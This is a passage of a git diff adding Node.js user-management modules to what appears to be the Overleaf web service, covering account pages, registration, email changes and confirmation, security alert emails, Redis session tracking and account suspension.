Boolean(user.writefull?.enabled), + }, + aiErrorAssistant: { + enabled: Boolean(user.aiErrorAssistant?.enabled), + }, + }, + labsExperiments: user.labsExperiments ?? [], + hasPassword: !!user.hashedPassword, + shouldAllowEditingDetails, + oauthProviders: UserPagesController._translateProviderDescriptions( + oauthProviders, + req + ), + institutionLinked, + samlError, + institutionEmailNonCanonical: + institutionEmailNonCanonical && institutionRequestedEmail + ? institutionEmailNonCanonical + : undefined, + reconfirmedViaSAML, + reconfirmationRemoveEmail, + samlBeta: req.session.samlBeta, + ssoErrorMessage, + thirdPartyIds: UserPagesController._restructureThirdPartyIds(user), + projectSyncSuccessMessage, + personalAccessTokens, + emailAddressLimit: Settings.emailAddressLimit, + isManagedAccount: !!req.managedBy, + userRestrictions: Array.from(req.userRestrictions || []), + currentManagedUserAdminEmail, + gitBridgeEnabled: Settings.enableGitBridge, + isSaas: Features.hasFeature('saas'), + memberOfSSOEnabledGroups, + }) +} + +async function accountSuspended(req, res) { + if (SessionManager.isUserLoggedIn(req.session)) { + return res.redirect('/project') + } + res.render('user/accountSuspended', { + title: 'your_account_is_suspended', + }) +} + +async function reconfirmAccountPage(req, res) { + const pageData = { + reconfirm_email: req.session.reconfirm_email, + } + const { variant } = await SplitTestHandler.promises.getAssignment( + req, + res, + 'auth-pages-bs5' + ) + + const template = + variant === 'enabled' ? 'user/reconfirm-bs5' : 'user/reconfirm' + + res.render(template, pageData) +} + +const UserPagesController = { + accountSuspended: expressify(accountSuspended), + + registerPage(req, res) { + const sharedProjectData = req.session.sharedProjectData || {} + + const newTemplateData = {} + if (req.session.templateData != null) { + newTemplateData.templateName = req.session.templateData.templateName + } + + res.render('user/register', { + title: 'register', + sharedProjectData, + newTemplateData, + samlBeta: req.session.samlBeta, + }) + }, + + loginPage(req, res) { + // if user is being sent to /login with explicit redirect (redir=/foo), + // such as being sent from the editor to /login, then set the redirect explicitly + if ( + req.query.redir != null && + AuthenticationController.getRedirectFromSession(req) == null + ) { + AuthenticationController.setRedirectInSession(req, req.query.redir) + } + res.render('user/login', { + title: Settings.nav?.login_support_title || 'login', + login_support_title: Settings.nav?.login_support_title, + login_support_text: Settings.nav?.login_support_text, + }) + }, + + /** + * Landing page for users who may have received one-time login + * tokens from the read-only maintenance site. + * + * We tell them that Overleaf is back up and that they can login normally. + */ + oneTimeLoginPage(req, res, next) { + res.render('user/one_time_login') + }, + + renderReconfirmAccountPage: expressify(reconfirmAccountPage), + + settingsPage: expressify(settingsPage), + + sessionsPage(req, res, next) { + const user = SessionManager.getSessionUser(req.session) + logger.debug({ userId: user._id }, 'loading sessions page') + const currentSession = { + ip_address: user.ip_address, + session_created: user.session_created, + } + UserSessionsManager.getAllUserSessions( + user, + [req.sessionID], + (err, sessions) => { + if (err != null) { + OError.tag(err, 'error getting all user sessions', { + userId: user._id, + }) + return next(err) + } + res.render('user/sessions', { + title: 'sessions', + currentSession, + sessions, + }) + } + ) + }, + + emailPreferencesPage(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + UserGetter.getUser( + userId, + { _id: 1, email: 1, first_name: 1, last_name: 1 }, + (err, user) => { + if (err != null) { + return next(err) + } + NewsletterManager.subscribed(user, (err, subscribed) => { + if (err != null) { + OError.tag(err, 'error getting newsletter subscription status') + return next(err) + } + res.render('user/email-preferences', { + title: 'newsletter_info_title', + subscribed, + }) + }) + } + ) + }, + + async compromisedPasswordPage(req, res) { + res.render('user/compromised_password') + }, + + _restructureThirdPartyIds(user) { + // 3rd party identifiers are an array of objects + // this turn them into a single object, which + // makes data easier to use in template + if ( + !user.thirdPartyIdentifiers || + user.thirdPartyIdentifiers.length === 0 + ) { + return null + } + return user.thirdPartyIdentifiers.reduce((obj, identifier) => { + obj[identifier.providerId] = identifier.externalUserId + return obj + }, {}) + }, + + _translateProviderDescriptions(providers, req) { + const result = {} + if (providers) { + for (const provider in providers) { + const data = providers[provider] + data.description = req.i18n.translate( + data.descriptionKey, + Object.assign({}, data.descriptionOptions) + ) + result[provider] = data + } + } + return result + }, +} + +export default UserPagesController diff --git a/services/web/app/src/Features/User/UserPostRegistrationAnalyticsManager.js b/services/web/app/src/Features/User/UserPostRegistrationAnalyticsManager.js new file mode 100644 index 0000000..26dbf86 --- /dev/null +++ b/services/web/app/src/Features/User/UserPostRegistrationAnalyticsManager.js @@ -0,0 +1,46 @@ +const Queues = require('../../infrastructure/Queues') +const UserGetter = require('./UserGetter') +const { + promises: InstitutionsAPIPromises, +} = require('../Institutions/InstitutionsAPI') +const AnalyticsManager = require('../Analytics/AnalyticsManager') + +const ONE_DAY_MS = 24 * 60 * 60 * 1000 + +async function schedulePostRegistrationAnalytics(user) { + await Queues.createScheduledJob( + 'post-registration-analytics', + { data: { userId: user._id } }, + ONE_DAY_MS + ) +} + +async function postRegistrationAnalytics(userId) { + const user = await UserGetter.promises.getUser({ _id: userId }, { email: 1 }) + if (!user) { + return + } + await checkAffiliations(userId) +} + +async function checkAffiliations(userId) { + const affiliationsData = + await InstitutionsAPIPromises.getUserAffiliations(userId) + const hasCommonsAccountAffiliation = affiliationsData.some( + affiliationData => + affiliationData.institution && affiliationData.institution.commonsAccount + ) + + if (hasCommonsAccountAffiliation) { + await AnalyticsManager.setUserPropertyForUser( + userId, + 'registered-from-commons-account', + true + ) + } +} + +module.exports = { + schedulePostRegistrationAnalytics, + postRegistrationAnalytics, +} diff --git a/services/web/app/src/Features/User/UserPrimaryEmailCheckHandler.js b/services/web/app/src/Features/User/UserPrimaryEmailCheckHandler.js new file mode 100644 index 0000000..be1d045 --- /dev/null +++ b/services/web/app/src/Features/User/UserPrimaryEmailCheckHandler.js @@ -0,0 +1,33 @@ +const Settings = require('@overleaf/settings') + +function requiresPrimaryEmailCheck({ + email, + emails, + lastPrimaryEmailCheck, + signUpDate, +}) { + const hasExpired = date => { + if (!date) { + return true + } + return Date.now() - date.getTime() > Settings.primary_email_check_expiration + } + + const primaryEmailConfirmedAt = emails.find( + emailEntry => emailEntry.email === email + ).confirmedAt + + if (primaryEmailConfirmedAt && !hasExpired(primaryEmailConfirmedAt)) { + return false + } + + if (lastPrimaryEmailCheck) { + return hasExpired(lastPrimaryEmailCheck) + } else { + return hasExpired(signUpDate) + } +} + +module.exports = { + requiresPrimaryEmailCheck, +} diff --git a/services/web/app/src/Features/User/UserRegistrationHandler.js b/services/web/app/src/Features/User/UserRegistrationHandler.js new file mode 100644 index 0000000..02c52f7 --- /dev/null +++ b/services/web/app/src/Features/User/UserRegistrationHandler.js @@ -0,0 +1,136 @@ +const { User } = require('../../models/User') +const UserCreator = require('./UserCreator') +const UserGetter = require('./UserGetter') +const AuthenticationManager = require('../Authentication/AuthenticationManager') +const NewsletterManager = require('../Newsletter/NewsletterManager') +const logger = require('@overleaf/logger') +const crypto = require('crypto') +const EmailHandler = require('../Email/EmailHandler') +const OneTimeTokenHandler = require('../Security/OneTimeTokenHandler') +const settings = require('@overleaf/settings') +const EmailHelper = require('../Helpers/EmailHelper') +const { + callbackify, + callbackifyMultiResult, +} = require('@overleaf/promise-utils') +const OError = require('@overleaf/o-error') + +const UserRegistrationHandler = { + _registrationRequestIsValid(body) { + const invalidEmail = AuthenticationManager.validateEmail(body.email || '') + const invalidPassword = AuthenticationManager.validatePassword( + body.password || '', + body.email + ) + return !(invalidEmail || invalidPassword) + }, + + async _createNewUserIfRequired(user, userDetails) { + if (!user) { + userDetails.holdingAccount = false + return await UserCreator.promises.createNewUser( + { + holdingAccount: false, + email: userDetails.email, + first_name: userDetails.first_name, + last_name: userDetails.last_name, + analyticsId: userDetails.analyticsId, + }, + {} + ) + } + return user + }, + + async registerNewUser(userDetails) { + const requestIsValid = + UserRegistrationHandler._registrationRequestIsValid(userDetails) + + if (!requestIsValid) { + throw new Error('request is not valid') + } + userDetails.email = EmailHelper.parseEmail(userDetails.email) + + let user = await UserGetter.promises.getUserByAnyEmail(userDetails.email) + if (user && user.holdingAccount === false) { + // We add userId to the error object so that the calling function can access + // the id of the already existing user account. + throw new OError('EmailAlreadyRegistered', { userId: user._id }) + } + + user = await UserRegistrationHandler._createNewUserIfRequired( + user, + userDetails + ) + + await User.updateOne( + { _id: user._id }, + { $set: { holdingAccount: false } } + ).exec() + + await AuthenticationManager.promises.setUserPassword( + user, + userDetails.password + ) + + if (userDetails.subscribeToNewsletter === 'true') { + try { + NewsletterManager.subscribe(user) + } catch (error) { + logger.warn( + { err: error, user }, + 'Failed to subscribe user to newsletter' + ) + throw error + } + } + + return user + }, + + async registerNewUserAndSendActivationEmail(email) { + let user + try { + user = await UserRegistrationHandler.registerNewUser({ + email, + password: crypto.randomBytes(32).toString('hex'), + }) + } catch (error) { + if (error.message === 'EmailAlreadyRegistered') { + logger.debug({ email }, 'user already exists, resending welcome email') + user = await UserGetter.promises.getUserByAnyEmail(email) + } else { + throw error + } + } + + const ONE_WEEK = 7 * 24 * 60 * 60 // seconds + const token = await OneTimeTokenHandler.promises.getNewToken( + 'password', + { user_id: user._id.toString(), email: user.email }, + { expiresIn: ONE_WEEK } + ) + + const setNewPasswordUrl = `${settings.siteUrl}/user/activate?token=${token}&user_id=${user._id}` + + await EmailHandler.promises + .sendEmail('registered', { + to: user.email, + setNewPasswordUrl, + }) + .catch(error => { + logger.warn({ err: error }, 'failed to send activation email') + }) + + return { user, setNewPasswordUrl } + }, +} + +module.exports = { + registerNewUser: callbackify(UserRegistrationHandler.registerNewUser), + registerNewUserAndSendActivationEmail: callbackifyMultiResult( + UserRegistrationHandler.registerNewUserAndSendActivationEmail, + ['user', 'setNewPasswordUrl'] + ), + promises: UserRegistrationHandler, +} diff --git a/services/web/app/src/Features/User/UserSessionsManager.js b/services/web/app/src/Features/User/UserSessionsManager.js new file mode 100644 index 0000000..d4f7eb7 --- /dev/null +++ b/services/web/app/src/Features/User/UserSessionsManager.js @@ -0,0 +1,258 @@ +const OError = require('@overleaf/o-error') +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const Async = require('async') +const _ = require('lodash') +const { promisify } = require('util') +const UserSessionsRedis = require('./UserSessionsRedis') +const rclient = UserSessionsRedis.client() + +const UserSessionsManager = { + // mimic the key used by the express sessions + _sessionKey(sessionId) { + return `sess:${sessionId}` + }, + + trackSession(user, sessionId, callback) { + if (!user) { + return callback(null) + } + if (!sessionId) { + return callback(null) + } + const sessionSetKey = UserSessionsRedis.sessionSetKey(user) + const value = UserSessionsManager._sessionKey(sessionId) + rclient + .multi() + .sadd(sessionSetKey, value) + .pexpire(sessionSetKey, `${Settings.cookieSessionLength}`) // in milliseconds + .exec(function (err, response) { + if (err) { + OError.tag( + err, + 'error while adding session key to UserSessions set', + { + user_id: user._id, + sessionSetKey, + } + ) + return callback(err) + } + UserSessionsManager._checkSessions(user, function () {}) + callback() + }) + }, + + untrackSession(user, sessionId, callback) { + if (!callback) { + callback = function () {} + } + if (!user) { + return callback(null) + } + if (!sessionId) { + return callback(null) + } + const sessionSetKey = UserSessionsRedis.sessionSetKey(user) + const value = UserSessionsManager._sessionKey(sessionId) + rclient + .multi() + .srem(sessionSetKey, value) + .pexpire(sessionSetKey, `${Settings.cookieSessionLength}`) // in milliseconds + .exec(function (err, response) { + if (err) { + OError.tag( + err, + 'error while removing session key from UserSessions set', + { + user_id: user._id, + sessionSetKey, + } + ) + return callback(err) + } + UserSessionsManager._checkSessions(user, function () {}) + callback() + }) + }, + + getAllUserSessions(user, exclude, callback) { + exclude = _.map(exclude, UserSessionsManager._sessionKey) + const sessionSetKey = UserSessionsRedis.sessionSetKey(user) + rclient.smembers(sessionSetKey, function (err, sessionKeys) { + if (err) { + OError.tag(err, 'error getting all session keys for user from redis', { + user_id: user._id, + }) + return callback(err) + } + sessionKeys = _.filter(sessionKeys, k => !_.includes(exclude, k)) + if (sessionKeys.length === 0) { + logger.debug({ userId: user._id }, 'no other sessions found, returning') + return callback(null, []) + } + + Async.mapSeries( + sessionKeys, + (k, cb) => rclient.get(k, cb), + function (err, sessions) { + if (err) { + OError.tag(err, 'error getting all sessions for user from redis', { + user_id: user._id, + }) + return callback(err) + } + + const result = [] + for (let session of Array.from(sessions)) { + if (!session) { + continue + } + session = JSON.parse(session) + let sessionUser = session.passport && session.passport.user + if (!sessionUser) { + sessionUser = session.user + } + + result.push({ + ip_address: sessionUser.ip_address, + session_created: sessionUser.session_created, + }) + } + + callback(null, result) + } + ) + }) + }, + + /** + * @param {{_id: string}} user + * @param {string | null | undefined} retainSessionID - the session ID to exclude from deletion + * @param {(err: Error | null, data?: unknown) => void} callback + */ + removeSessionsFromRedis(user, retainSessionID, callback) { + if (!user) { + return callback( + new Error('bug: user not passed to removeSessionsFromRedis') + ) + } + const sessionSetKey = UserSessionsRedis.sessionSetKey(user) + rclient.smembers(sessionSetKey, function (err, sessionKeys) { + if (err) { + OError.tag(err, 'error getting contents of UserSessions set', { + user_id: user._id, + sessionSetKey, + }) + return callback(err) + } + const keysToDelete = retainSessionID + ? _.without( + sessionKeys, + UserSessionsManager._sessionKey(retainSessionID) + ) + : sessionKeys + if (keysToDelete.length === 0) { + logger.debug( + { userId: user._id }, + 'no sessions in UserSessions set to delete, returning' + ) + return callback(null, 0) + } + logger.debug( + { userId: user._id, count: keysToDelete.length }, + 'deleting sessions for user' + ) + + const deletions = keysToDelete.map(k => cb => rclient.del(k, cb)) + + Async.series(deletions, function (err, _result) { + if (err) { + OError.tag(err, 'error revoking all sessions for user', { + user_id: user._id, + sessionSetKey, + }) + return callback(err) + } + rclient.srem(sessionSetKey, keysToDelete, function (err) { + if (err) { + OError.tag(err, 'error removing session set for user', { + user_id: user._id, + sessionSetKey, + }) + return callback(err) + } + callback(null, keysToDelete.length) + }) + }) + }) + }, + + touch(user, callback) { + if (!user) { + return callback(null) + } + const sessionSetKey = UserSessionsRedis.sessionSetKey(user) + rclient.pexpire( + sessionSetKey, + `${Settings.cookieSessionLength}`, // in milliseconds + function (err, response) { + if (err) { + OError.tag(err, 'error while updating ttl on UserSessions set', { + user_id: user._id, + }) + return callback(err) + } + callback(null) + } + ) + }, + + _checkSessions(user, callback) { + if (!user) { + return callback(null) + } + const sessionSetKey = UserSessionsRedis.sessionSetKey(user) + rclient.smembers(sessionSetKey, function (err, sessionKeys) { + if (err) { + OError.tag(err, 'error getting contents of UserSessions set', { + user_id: user._id, + sessionSetKey, + }) + return callback(err) + } + Async.series( + sessionKeys.map( + key => next => + rclient.get(key, function (err, val) { + if (err) { + return next(err) + } + if (!val) { + rclient.srem(sessionSetKey, key, function (err, result) { + return next(err) + }) + } else { + next() + } + }) + ), + function (err, results) { + callback(err) + } + ) + }) + }, +} + +UserSessionsManager.promises = { + getAllUserSessions: promisify(UserSessionsManager.getAllUserSessions), + removeSessionsFromRedis: (user, retainSessionID = null) => + promisify(UserSessionsManager.removeSessionsFromRedis)( + user, + retainSessionID + ), + untrackSession: promisify(UserSessionsManager.untrackSession), +} + +module.exports = UserSessionsManager diff --git a/services/web/app/src/Features/User/UserSessionsRedis.js b/services/web/app/src/Features/User/UserSessionsRedis.js new file mode 100644 index 0000000..689e414 --- /dev/null +++ b/services/web/app/src/Features/User/UserSessionsRedis.js @@ -0,0 +1,13 @@ +const RedisWrapper = require('../../infrastructure/RedisWrapper') +const rclient = RedisWrapper.client('websessions') + +const UserSessionsRedis = { + client() { + return rclient + }, + + sessionSetKey(user) { + return `UserSessions:{${user._id}}` + }, +} +module.exports = UserSessionsRedis diff --git a/services/web/app/src/Features/User/UserUpdater.js b/services/web/app/src/Features/User/UserUpdater.js new file mode 100644 index 0000000..627e738 --- /dev/null +++ b/services/web/app/src/Features/User/UserUpdater.js @@ -0,0 +1,620 @@ +const logger = require('@overleaf/logger') +const OError = require('@overleaf/o-error') +const { db } = require('../../infrastructure/mongodb') +const { normalizeQuery } = require('../Helpers/Mongo') +const { callbackify } = require('util') +const UserGetter = require('./UserGetter') +const InstitutionsAPI = require('../Institutions/InstitutionsAPI') +const Features = require('../../infrastructure/Features') +const FeaturesUpdater = require('../Subscription/FeaturesUpdater') +const EmailHandler = require('../Email/EmailHandler') +const EmailHelper = require('../Helpers/EmailHelper') +const Errors = require('../Errors/Errors') +const NewsletterManager = require('../Newsletter/NewsletterManager') +const RecurlyWrapper = require('../Subscription/RecurlyWrapper') +const UserAuditLogHandler = require('./UserAuditLogHandler') +const AnalyticsManager = require('../Analytics/AnalyticsManager') +const SubscriptionLocator = require('../Subscription/SubscriptionLocator') +const NotificationsBuilder = require('../Notifications/NotificationsBuilder') +const _ = require('lodash') +const Modules = require('../../infrastructure/Modules') +const UserSessionsManager = require('./UserSessionsManager') + +async function _sendSecurityAlertPrimaryEmailChanged( + userId, + oldEmail, + email, + deleteOldEmail +) { + // here + // Send email to the following: + // - the old primary + // - the new primary + // - for all other current (confirmed or recently-enough reconfirmed) email addresses, group by institution if we + // have it, or domain if we don’t, and for each group send to the most recently reconfirmed (or confirmed if never + // reconfirmed) address in that group. + // See #6101. + const emailOptions = { + actionDescribed: `the primary email address on your account was changed to ${email}`, + action: 'change of primary email address', + message: deleteOldEmail + ? [ + `We also removed the previous primary email ${oldEmail} from the account.`, + ] + : [], + } + + async function sendToRecipients(recipients) { + // On failure, log the error and carry on so that one email failing does not prevent other emails sending + for await (const recipient of recipients) { + try { + const opts = Object.assign({}, emailOptions, { to: recipient }) + await EmailHandler.promises.sendEmail('securityAlert', opts) + } catch (error) { + logger.error( + { error, userId }, + 'could not send security alert email when primary email changed' + ) + } + } + } + + // First, send notification to the old and new primary emails before getting other emails from v1 to ensure that these + // are still sent in the event of not being able to reach v1 + const oldAndNewPrimaryEmails = [oldEmail, email] + await sendToRecipients(oldAndNewPrimaryEmails) + + // Next, get extra recipients with affiliation data + const emailsData = await UserGetter.promises.getUserFullEmails(userId) + const extraRecipients = _securityAlertPrimaryEmailChangedExtraRecipients( + emailsData, + oldEmail, + email + ) + + await sendToRecipients(extraRecipients) +} + +/** + * Add a new email address for the user. Email cannot be already used by this + * or any other user + */ +async function addEmailAddress(userId, newEmail, affiliationOptions, auditLog) { + newEmail = EmailHelper.parseEmail(newEmail) + if (!newEmail) { + throw new Error('invalid email') + } + + await UserGetter.promises.ensureUniqueEmailAddress(newEmail) + + AnalyticsManager.recordEventForUserInBackground( + userId, + 'secondary-email-added' + ) + + await UserAuditLogHandler.promises.addEntry( + userId, + 'add-email', + auditLog.initiatorId, + auditLog.ipAddress, + { + newSecondaryEmail: newEmail, + } + ) + + try { + await InstitutionsAPI.promises.addAffiliation( + userId, + newEmail, + affiliationOptions + ) + } catch (error) { + throw OError.tag(error, 'problem adding affiliation while adding email') + } + + try { + const reversedHostname = newEmail.split('@')[1].split('').reverse().join('') + const update = { + $push: { + emails: { email: newEmail, createdAt: new Date(), reversedHostname }, + }, + } + await updateUser({ _id: userId, 'emails.email': { $ne: newEmail } }, update) + } catch (error) { + throw OError.tag(error, 'problem updating users emails') + } +} + +async function clearSAMLData(userId, auditLog, sendEmail) { + const user = await UserGetter.promises.getUser(userId, { + email: 1, + emails: 1, + }) + + await UserAuditLogHandler.promises.addEntry( + userId, + 'clear-institution-sso-data', + auditLog.initiatorId, + auditLog.ipAddress, + {} + ) + + const update = { + $unset: { + samlIdentifiers: 1, + 'emails.$[].samlProviderId': 1, + 'enrollment.sso': 1, + }, + } + + await updateUser(userId, update) + + for (const emailData of user.emails) { + await InstitutionsAPI.promises.removeEntitlement(userId, emailData.email) + } + + await FeaturesUpdater.promises.refreshFeatures( + userId, + 'clear-institution-sso-data' + ) + + if (sendEmail) { + await EmailHandler.promises.sendEmail('SAMLDataCleared', { to: user.email }) + } +} + +/** + * set the default email address by setting the `email` attribute. The email + * must be one of the user's multiple emails (`emails` attribute) + */ +async function setDefaultEmailAddress( + userId, + email, + allowUnconfirmed, + auditLog, + sendSecurityAlert, + deleteOldEmail = false +) { + email = EmailHelper.parseEmail(email) + if (email == null) { + throw new Error('invalid email') + } + + const user = await UserGetter.promises.getUser(userId, { + email: 1, + emails: 1, + }) + if (!user) { + throw new Error('invalid userId') + } + + const oldEmail = user.email + const userEmail = user.emails.find(e => e.email === email) + if (!userEmail) { + throw new Error('Default email does not belong to user') + } + if (!userEmail.confirmedAt && !allowUnconfirmed) { + throw new Errors.UnconfirmedEmailError() + } + + await UserAuditLogHandler.promises.addEntry( + userId, + 'change-primary-email', + auditLog.initiatorId, + auditLog.ipAddress, + { + newPrimaryEmail: email, + oldPrimaryEmail: oldEmail, + } + ) + + const query = { _id: userId, 'emails.email': email } + const update = { $set: { email, lastPrimaryEmailCheck: new Date() } } + const res = await updateUser(query, update) + + // this should not happen + if (res.matchedCount !== 1) { + throw new Error('email update error') + } + + AnalyticsManager.recordEventForUserInBackground( + userId, + 'primary-email-address-updated' + ) + + if (sendSecurityAlert) { + // no need to wait, errors are logged and not passed back + _sendSecurityAlertPrimaryEmailChanged( + userId, + oldEmail, + email, + deleteOldEmail + ).catch(err => { + logger.error({ err }, 'failed to send security alert email') + }) + } + + try { + await NewsletterManager.promises.changeEmail(user, email) + } catch (error) { + logger.warn( + { err: error, oldEmail, newEmail: email }, + 'Failed to change email in newsletter subscription' + ) + } + try { + await Modules.promises.hooks.fire('userEmailChanged', user, email) + } catch (err) { + logger.error( + { err, oldEmail, newEmail: email }, + 'Failed to fire "userEmailChanged" hook' + ) + } + + try { + await RecurlyWrapper.promises.updateAccountEmailAddress(user._id, email) + } catch (error) { + // errors are ignored + } +} + +/** + * Overwrites the primary email address of a user in the database in-place. + * This function is only intended for use in scripts to migrate email addresses + * where we do not want to trigger all the actions that happen when a user + * changes their own email. It should not be used in any other circumstances. + */ +async function migrateDefaultEmailAddress( + userId, + oldEmail, + newEmail, + auditLog +) { + oldEmail = EmailHelper.parseEmail(oldEmail) + if (oldEmail == null) { + throw new Error('invalid old email') + } + newEmail = EmailHelper.parseEmail(newEmail) + if (newEmail == null) { + throw new Error('invalid new email') + } + const reversedHostname = newEmail.split('@')[1].split('').reverse().join('') + const query = { + _id: userId, + email: oldEmail, + 'emails.email': oldEmail, + } + const update = { + $set: { + email: newEmail, + 'emails.$.email': newEmail, + 'emails.$.reversedHostname': reversedHostname, + }, + } + const result = await updateUser(query, update) + if (result.modifiedCount !== 1) { + throw new Error('email update error') + } + // add a user audit log entry for the email change + await UserAuditLogHandler.promises.addEntry( + userId, + 'migrate-default-email', + auditLog.initiatorId, + auditLog.ipAddress, + { + oldEmail, + newEmail, + // Add optional extra info + ...(auditLog.extraInfo || {}), + } + ) +} + +async function confirmEmail(userId, email, affiliationOptions) { + // used for initial email confirmation (non-SSO and SSO) + // also used for reconfirmation of non-SSO emails + const confirmedAt = new Date() + email = EmailHelper.parseEmail(email) + if (email == null) { + throw new Error('invalid email') + } + logger.debug({ userId, email }, 'confirming user email') + + try { + affiliationOptions = affiliationOptions || {} + affiliationOptions.confirmedAt = confirmedAt + await InstitutionsAPI.promises.addAffiliation( + userId, + email, + affiliationOptions + ) + } catch (error) { + throw OError.tag(error, 'problem adding affiliation while confirming email') + } + + const query = { + _id: userId, + 'emails.email': email, + } + + // only update confirmedAt if it was not previously set + const update = { + $set: { + 'emails.$.reconfirmedAt': confirmedAt, + }, + $min: { + 'emails.$.confirmedAt': confirmedAt, + }, + } + + if (Features.hasFeature('affiliations')) { + update.$unset = { + 'emails.$.affiliationUnchecked': 1, + } + } + + const res = await updateUser(query, update) + + if (res.matchedCount !== 1) { + throw new Errors.NotFoundError('user id and email do no match') + } + await FeaturesUpdater.promises.refreshFeatures(userId, 'confirm-email') + try { + await maybeCreateRedundantSubscriptionNotification(userId, email) + } catch (error) { + logger.err( + { err: error }, + 'error checking redundant subscription on email confirmation' + ) + } +} + +async function maybeCreateRedundantSubscriptionNotification(userId, email) { + const subscription = + await SubscriptionLocator.promises.getUserIndividualSubscription(userId) + if (!subscription || subscription.groupPlan) { + return + } + + const affiliations = + await InstitutionsAPI.promises.getUserAffiliations(userId) + const confirmedAffiliation = affiliations.find(a => a.email === email) + if (!confirmedAffiliation || confirmedAffiliation.licence === 'free') { + return + } + + await NotificationsBuilder.promises + .redundantPersonalSubscription( + { + institutionId: confirmedAffiliation.institution.id, + institutionName: confirmedAffiliation.institution.name, + }, + { _id: userId } + ) + .create() +} + +async function removeEmailAddress( + userId, + email, + auditLog, + skipParseEmail = false +) { + // remove one of the user's email addresses. The email cannot be the user's + // default email address + if (!skipParseEmail) { + email = EmailHelper.parseEmail(email) + } else if (skipParseEmail && typeof email !== 'string') { + throw new Error('email must be a string') + } + + if (!email) { + throw new Error('invalid email') + } + + const isMainEmail = await UserGetter.promises.getUserByMainEmail(email, { + _id: 1, + }) + if (isMainEmail) { + throw new Error('cannot remove primary email') + } + + await UserAuditLogHandler.promises.addEntry( + userId, + 'remove-email', + auditLog.initiatorId, + auditLog.ipAddress, + { + removedEmail: email, + // Add optional extra info + ...(auditLog.extraInfo || {}), + } + ) + + try { + await InstitutionsAPI.promises.removeAffiliation(userId, email) + } catch (error) { + OError.tag(error, 'problem removing affiliation') + throw error + } + + const query = { _id: userId, email: { $ne: email } } + const update = { $pull: { emails: { email } } } + + let res + try { + res = await updateUser(query, update) + } catch (error) { + OError.tag(error, 'problem removing users email') + throw error + } + + if (res.matchedCount !== 1) { + throw new Error('Cannot remove email') + } + + await FeaturesUpdater.promises.refreshFeatures(userId, 'remove-email') +} + +async function addAffiliationForNewUser( + userId, + email, + affiliationOptions = {} +) { + await InstitutionsAPI.promises.addAffiliation( + userId, + email, + affiliationOptions + ) + try { + await updateUser( + { _id: userId, 'emails.email': email }, + { $unset: { 'emails.$.affiliationUnchecked': 1 } } + ) + } catch (error) { + logger.error( + OError.tag( + error, + 'could not remove affiliationUnchecked flag for user on create', + { + userId, + email, + } + ) + ) + } +} + +async function updateUser(query, update) { + query = normalizeQuery(query) + const result = await db.users.updateOne(query, update) + return result +} + +/** + * DEPRECATED + * + * Change the user's main email address by adding a new email, switching the + * default email and removing the old email. Prefer manipulating multiple + * emails and the default rather than calling this method directly + */ +async function changeEmailAddress(userId, newEmail, auditLog) { + newEmail = EmailHelper.parseEmail(newEmail) + if (newEmail == null) { + throw new Error('invalid email') + } + + const oldEmail = await UserGetter.promises.getUserEmail(userId) + await addEmailAddress(userId, newEmail, {}, auditLog) + await setDefaultEmailAddress(userId, newEmail, true, auditLog, true) + await removeEmailAddress(userId, oldEmail, auditLog) +} + +/** + * @param {string} userId + * @param {{initiatorId: string, ip: string}} auditLog + * @returns {Promise<void>} + */ +async function removeReconfirmFlag(userId, auditLog) { + await UserAuditLogHandler.promises.addEntry( + userId.toString(), + 'must-reset-password-unset', + auditLog.initiatorId, + auditLog.ip + ) + await updateUser(userId.toString(), { $set: { must_reconfirm: false } }) +} + +async function suspendUser(userId, auditLog = {}) { + const res = await updateUser( + { _id: userId, suspended: { $ne: true } }, + { $set: { suspended: true } } + ) + if (res.matchedCount !== 1) { + throw new Errors.NotFoundError('user id not found or already suspended') + } + await UserAuditLogHandler.promises.addEntry( + userId, + 'account-suspension', + auditLog.initiatorId, + auditLog.ip, + auditLog.info || {} + ) + await UserSessionsManager.promises.removeSessionsFromRedis({ _id: userId }) + await Modules.promises.hooks.fire( + 'removeDropbox', + userId, + 'account-suspension' + ) +} + +function _securityAlertPrimaryEmailChangedExtraRecipients( + emailsData, + oldEmail, + email +) { + // Group by institution if we have it, or domain if we don’t, and for each group send to the most recently + // reconfirmed (or confirmed if never reconfirmed) address in that group. We also remove the original and new + // primary email addresses because they are emailed separately + // See #6101. + function sortEmailsByConfirmation(emails) { + return emails.sort((e1, e2) => e2.lastConfirmedAt - e1.lastConfirmedAt) + } + + const recipients = new Set() + const emailsToIgnore = new Set([oldEmail, email]) + + // Remove non-confirmed emails + const confirmedEmails = emailsData.filter(email => !!email.lastConfirmedAt) + + // Group other emails by institution, separating out those with no institution and grouping them instead by domain. + // The keys for each group are not used for anything other than the grouping, so can have a slightly paranoid format + // to avoid any potential clash + const groupedEmails = _.groupBy(confirmedEmails, emailData => { + if (!emailData.affiliation || !emailData.affiliation.institution) { + return `domain:${EmailHelper.getDomain(emailData.email)}` + } + return `institution_id:${emailData.affiliation.institution.id}` + }) + + // For each group of emails, order the emails by (re-)confirmation date and pick the first + for (const emails of Object.values(groupedEmails)) { + // Sort by confirmation and pick the first + sortEmailsByConfirmation(emails) + + // Ignore original and new primary email addresses + const recipient = emails[0].email + if (!emailsToIgnore.has(recipient)) { + recipients.add(emails[0].email) + } + } + + return Array.from(recipients) +} + +module.exports = { + addAffiliationForNewUser: callbackify(addAffiliationForNewUser), + addEmailAddress: callbackify(addEmailAddress), + changeEmailAddress: callbackify(changeEmailAddress), + clearSAMLData: callbackify(clearSAMLData), + confirmEmail: callbackify(confirmEmail), + removeEmailAddress: callbackify(removeEmailAddress), + removeReconfirmFlag: callbackify(removeReconfirmFlag), + setDefaultEmailAddress: callbackify(setDefaultEmailAddress), + migrateDefaultEmailAddress: callbackify(migrateDefaultEmailAddress), + updateUser: callbackify(updateUser), + suspendUser: callbackify(suspendUser), + promises: { + addAffiliationForNewUser, + addEmailAddress, + changeEmailAddress, + clearSAMLData, + confirmEmail, + removeEmailAddress, + removeReconfirmFlag, + setDefaultEmailAddress, + migrateDefaultEmailAddress, + updateUser, + suspendUser, + }, +} diff --git a/services/web/app/src/Features/UserMembership/UserMembershipAuthorization.js b/services/web/app/src/Features/UserMembership/UserMembershipAuthorization.js new file mode 100644 index 0000000..a7f25c1 --- /dev/null +++ b/services/web/app/src/Features/UserMembership/UserMembershipAuthorization.js @@ -0,0 +1,30 @@ +const UserMembershipAuthorization = { + hasStaffAccess(requiredStaffAccess) { + return req => { + if (!req.user) { + return false + } + return ( + requiredStaffAccess && + req.user.staffAccess && + 